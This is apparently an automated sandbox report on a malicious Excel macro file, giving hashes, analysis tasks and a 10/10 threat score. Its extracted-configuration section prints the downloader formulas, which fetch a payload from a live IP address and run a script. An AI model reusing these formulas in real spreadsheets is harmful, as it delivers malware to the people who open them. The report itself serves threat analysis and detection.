General
Target
c368ae91e64a96b8189e0798e5bb9739
Size
6KB
Sample
231222-rtnepaaffp
MD5
c368ae91e64a96b8189e0798e5bb9739
SHA1
23b36a29bcd4fe9ab5d7bd3ffba064e46a50a9b5
SHA256
1a4c1be4ec757f5ce46fc34551fda46e64291eacae408b8279ed05b6ca9d77a9
SHA512
c588b94cf1543b26b68b366a2c472b37003e8b926e9f52a25127b6d486e4be5032a2f19c4e8368bcca92daa22f09ae133749deac5ef605aa64862339273f5b34
SSDEEP
192:NDSAuSibrA2OmmfRN8UhHFBFYuLb98ygI8+I:NruTM2wn1FYmb98yXO
Static task
static1
Behavioral task
behavioral1
Sample
c368ae91e64a96b8189e0798e5bb9739.xlsm
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
c368ae91e64a96b8189e0798e5bb9739.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
Targets
Target
c368ae91e64a96b8189e0798e5bb9739
Score 10/10
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.